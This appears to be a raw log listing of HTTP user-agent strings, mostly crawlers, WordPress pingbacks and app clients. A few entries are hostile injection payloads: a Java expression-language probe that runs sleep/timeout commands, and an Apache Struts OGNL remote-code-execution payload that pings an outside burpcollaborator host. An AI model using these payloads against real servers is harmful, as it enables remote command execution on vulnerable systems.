AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36 PTST/210630.153044 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625140329-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625142309-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625160253-0 +curl/7.13.1 (powerpc-apple-darwin8.0) libcurl/7.13.1 OpenSSL/0.9.7b zlib/1.2.2 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 PTST/210702.163639 +WordPress.com; http://test.realradio.it +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625186012-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625200227-0 +WhatsApp/2.21.14.6 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625187303-10 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 PTST/210701.214641 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625191305-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625191306-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625191968-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625191978-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625201056-10 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36 PTST/210701.214641 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625256164-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625256166-10 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36 PTST/210702.163639 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625190484-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625189753-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625203507-0 +WhatsApp/2.21.121.1 i +WhatsApp/2.21.12.22 A +WordPress.com; http://iniciarbr.com +WordPress/5.7.2; https://appuals.com +WordPress/5.7.2; https://winzen.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625232837-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625232838-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625232892-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625232839-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625232850-10 +Java/11.0.11 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 11; SM-A305F ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625286100-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625310422-0 +AvsDeviceSdk/1.9.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 OPR/75.0.3969.243 +webcollage/1.183 +WordPress/5.7.2; https://www.tvj.co.in; verifying pingback from 45.160.224.2 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625374787-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625408671-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 YaBrowser/21.3.3.230 Yowser/2.5 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625361336-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625369451-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 8.0.0; DLI-TL20 ) U2/1.0.0 Mobile +WordPress/5.7.2; https://b16.tuyulninja.com +WordPress/4.9.10; https://www.scasset.com/th/; verifying pingback from 172.68.6.129 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625447213-10 +WhatsApp/2.21.13.26 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625453768-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625470389-0 +WordPress/5.7.2; https://techieguys.info + $ { (new java.io.BufferedReader(new java.io.InputStreamReader(((new java.lang.ProcessBuilder(new java.lang.String[]{\x22timeout\x22,\x2211\x22})).start()).getInputStream()))).readLine()} $ { (new java.io.BufferedReader(new java.io.InputStreamReader(((new java.lang.ProcessBuilder(new java.lang.String[]{\x22sleep\x22,\x2211\x22})).start()).getInputStream()))).readLine()} +%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping k0lmt7mva1cgabzc7nodclu75ybozd.burpcollaborator.net -c1').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} +javascript:/* +WordPress/5.7.2; https://tutorielsgeek.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625512294-0 +WordPress/5.6.4; https://techhana.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 5.0; SM-N910H ) U2/1.0.0 Mobile +Apache-HttpClient/4.5.10 (Java/11.0.6) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625542700-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1625574636-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625575679-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1625577149-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1625586470-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625590266-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625536336-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625547746-0 +yacybot (/global; amd64 Linux 5.10.0-7-amd64; java 17-ea; Europe/es) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1625578574-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1625580299-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1625590085-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 5.1.2; LG-X230 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.hlfs-rest_client/1625605904-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.hlfs-rest_client/1625605946-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.hlfs-rest_client/1625605904-60 +WordPress/5.7.2; https://staging.arageek.com +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.hlfs-rest_client/1625605905-10 +TuneIn Radio Pro/18.2 (Android 28; ONEPLUS A3003; Java) +Mozilla/4.0 (Windows NT (unknown) 6.2) Java/1.6.0_27 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625617462-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625630533-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625673906-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625680096-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625681705-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 PTST/210707.130406 +WordPress/5.7; https://horumon-shokuraku.jp/fc/news; verifying pingback from 31.173.81.155 +WhatsApp/2.21.14.8 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625618648-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625631639-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1625651910-10 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) adbeat.com/policy Gecko/20100101 Firefox/89.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625674518-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625682470-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625687092-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625621955-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625634796-0 +GuzzleHttp/6.5.5 curl/7.29.0 PHP/7.4.20 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625642772-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1625655242-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625655242-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625664878-0 +WhatsApp/2.21.13.28 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625675491-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625683364-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625684422-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625691903-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36 PTST/210707.130406 +curl/7.19.7 (i386-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.5.0 zlib/1.2.3 libidn/1.9 libssh2/1.2.2 +UnityPlayer/2019.4.15f1 (UnityWebRequest/1.0, libcurl/7.52.0-DEV) +rogerbot/1.0 (http://moz.com/help/pro/what-is-rogerbot-, rogerbot-crawler+partager@moz.com) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 PTST/210707.145501 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36 PTST/210707.145501 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625709035-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625717836-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625745714-0 +WhatsApp/2.21.130.15 i +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625758208-0 +WordPress/5.7.2; http://ratnaamalia.blog.upi.edu; verifying pingback from 31.173.84.141 +WordPress/5.7.2; https://sandmexpediting.com; verifying pingback from 185.7.145.88 +WordPress/5.2.11; https://thomascolesearch.co.uk/blog; verifying pingback from 185.7.145.88 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625708693-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625718609-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625747244-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625752026-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625755238-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625758796-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625768130-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) adbeat.com/policy Gecko/20100101 Firefox/90.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625768371-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625775793-10 +WhatsApp/2.21.14.15 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625781860-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625781866-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625710801-0 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625720313-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625749072-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625761132-0 +WordPress/5.7.2; https://www.arageek.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 5.1; SM-N900 ) U2/1.0.0 Mobile +python-requests/2.7.0 CPython/2.7.15 Windows/10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625791155-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625801280-0 +PycURL/7.43.0.4 libcurl/7.77.0 OpenSSL/1.1.1k zlib/1.2.11 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625839876-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625839878-10 +WordPress/5.4.6; http://blog.alisilver.co.uk; verifying pingback from 85.26.235.167 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.864.41 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625795689-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625801797-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625801799-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625804627-0 +curl/7.77.0-DEV +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625834105-0 +WhatsApp/2.21.14.16 A +WhatsApp/2.21.131.1 i +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1625831189-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625796375-0 +Google/Pixel 3a XL (Linux;Android 11) +WhatsApp/2.2126.10 N +GuzzleHttp/6.5.5 curl/7.58.0 PHP/7.4.20 +GuzzleHttp/6.5.5 curl/7.47.0 PHP/7.4.16 +WordPress/5.7; http://salamargo.pl; verifying pingback from 31.173.101.79 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625879468-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625879470-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625892322-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625892318-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625892319-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625879437-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1625888489-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625957706-0 +ddg_android/5.90.0 (com.duckduckgo.mobile.android; Android API 30) +WordPress/5.7.2; https://cluster-shop.ru +WordPress/5.7.2; https://kslift.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1625896643-0 +WordPress/5.4.6; https://peritossolutions.com +UCWEB/2.0 (Java; U; 